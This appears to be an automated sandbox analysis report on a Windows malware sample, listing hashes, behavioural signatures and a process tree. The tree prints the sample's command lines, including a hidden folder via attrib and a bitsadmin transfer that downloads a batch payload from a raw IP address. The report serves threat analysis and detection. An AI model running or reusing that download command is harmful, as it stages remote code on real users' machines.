Analysis
- max time kernel: 13s
- max time network: 21s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 05-08-2024 14:05
- Static task: static1
- Behavioral task: behavioral1
- Sample: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
- Resource: win7-20240705-en
General
- Target: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
- Size: 126KB
- MD5: b2dc0f8a36a7e450b11149a8e15ca964
- SHA1: 27fd3d24a969b5b0528b69f1cbd8b293e74a6809
- SHA256: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15
- SHA512: 135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933
- SSDEEP: 1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4
Malware Config
Signatures
- Download via BitsAdmin (1 TTPs, 2 IoCs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 19 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes: attrib.exe, cmd.exe, bitsadmin.exe, bitsadmin.exe, bitsadmin.exe, bitsadmin.exe, cmd.exe, cmd.exe, bitsadmin.exe, bitsadmin.exe, bitsadmin.exe, bitsadmin.exe, cmd.exe, bitsadmin.exe, ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe, cmd.exe, bitsadmin.exe, bitsadmin.exe, bitsadmin.exe

  description   ioc                                                           process
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   attrib.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   bitsadmin.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe
  Each write below is recorded four times in the report (16 distinct parent/child pairs, 64 IoCs in total).

  description                          pid    process                                                                   target process   count
  PID 2144 wrote to memory of 3060     2144   ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe     cmd.exe          4
  PID 3060 wrote to memory of 2788     3060   cmd.exe                                                                   attrib.exe       4
  PID 3060 wrote to memory of 2920     3060   cmd.exe                                                                   cmd.exe          4
  PID 2920 wrote to memory of 2936     2920   cmd.exe                                                                   bitsadmin.exe    4
  PID 3060 wrote to memory of 2940     3060   cmd.exe                                                                   bitsadmin.exe    4
  PID 3060 wrote to memory of 2948     3060   cmd.exe                                                                   bitsadmin.exe    4
  PID 3060 wrote to memory of 2808     3060   cmd.exe                                                                   cmd.exe          4
  PID 2808 wrote to memory of 2096     2808   cmd.exe                                                                   bitsadmin.exe    4
  PID 3060 wrote to memory of 2976     3060   cmd.exe                                                                   bitsadmin.exe    4
  PID 3060 wrote to memory of 1964     3060   cmd.exe                                                                   bitsadmin.exe    4
  PID 3060 wrote to memory of 2852     3060   cmd.exe                                                                   cmd.exe          4
  PID 2852 wrote to memory of 2988     2852   cmd.exe                                                                   bitsadmin.exe    4
  PID 3060 wrote to memory of 2696     3060   cmd.exe                                                                   bitsadmin.exe    4
  PID 3060 wrote to memory of 3032     3060   cmd.exe                                                                   bitsadmin.exe    4
  PID 3060 wrote to memory of 2688     3060   cmd.exe                                                                   cmd.exe          4
  PID 2688 wrote to memory of 2800     2688   cmd.exe                                                                   bitsadmin.exe    4
- Views/modifies file attributes (1 TTPs, 1 IoCs)
Processes (indented by process-tree depth)
- C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
  Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
  PID: 2144
  - C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t26049.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    PID: 3060
    - C:\Windows\SysWOW64\attrib.exe
      Command line: attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
      Signatures: System Location Discovery: System Language Discovery; Views/modifies file attributes
      PID: 2788
    - C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      PID: 2920
      - C:\Windows\SysWOW64\bitsadmin.exe
        Command line: Bitsadmin
        Signatures: System Location Discovery: System Language Discovery
        PID: 2936
    - C:\Windows\SysWOW64\bitsadmin.exe
      Command line: bitsadmin
      Signatures: System Location Discovery: System Language Discovery
      PID: 2940
    - C:\Windows\SysWOW64\bitsadmin.exe
      Command line: bitsadmin /crEaTe pls
      Signatures: Download via BitsAdmin; System Location Discovery: System Language Discovery
      PID: 2948
    - C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      PID: 2808
      - C:\Windows\SysWOW64\bitsadmin.exe
        Command line: Bitsadmin
        Signatures: System Location Discovery: System Language Discovery
        PID: 2096
    - C:\Windows\SysWOW64\bitsadmin.exe
      Command line: bitsadmin
      Signatures: System Location Discovery: System Language Discovery
      PID: 2976
    - C:\Windows\SysWOW64\bitsadmin.exe
      Command line: bitsadmin /ResUme pls
      Signatures: System Location Discovery: System Language Discovery
      PID: 1964
    - C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      PID: 2852
      - C:\Windows\SysWOW64\bitsadmin.exe
        Command line: Bitsadmin
        Signatures: System Location Discovery: System Language Discovery
        PID: 2988
    - C:\Windows\SysWOW64\bitsadmin.exe
      Command line: bitsadmin
      Signatures: System Location Discovery: System Language Discovery
      PID: 2696
    - C:\Windows\SysWOW64\bitsadmin.exe
      Command line: bitsadmin /CompLete pls
      Signatures: System Location Discovery: System Language Discovery
      PID: 3032
    - C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\System32\cmd.exe /c ""Bitsadmin
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      PID: 2688
      - C:\Windows\SysWOW64\bitsadmin.exe
        Command line: Bitsadmin
        Signatures: System Location Discovery: System Language Discovery
        PID: 2800
    - C:\Windows\SysWOW64\bitsadmin.exe
      Command line: bitsadmin
      Signatures: System Location Discovery: System Language Discovery
      PID: 2944
    - C:\Windows\SysWOW64\bitsadmin.exe
      Command line: bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
      Signatures: Download via BitsAdmin; System Location Discovery: System Language Discovery
      PID: 2832
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: c63068e2c14568d2561d4350a38a6475
  SHA1: 141406945974b7a7be1d908a035a8ccb88efa1a0
  SHA256: 9729a6b5370e1ea53546f0a4331cbf83441eb409d1ab1393501421204dbfcbd8
  SHA512: fc67084b7cd7003b0375fed2931c96645fdaabc70593fbaa3f0920943d9f4454c727025b386c9866b729bbbf0c45c5708f082c08bec2cbbe38a8b157b03498d0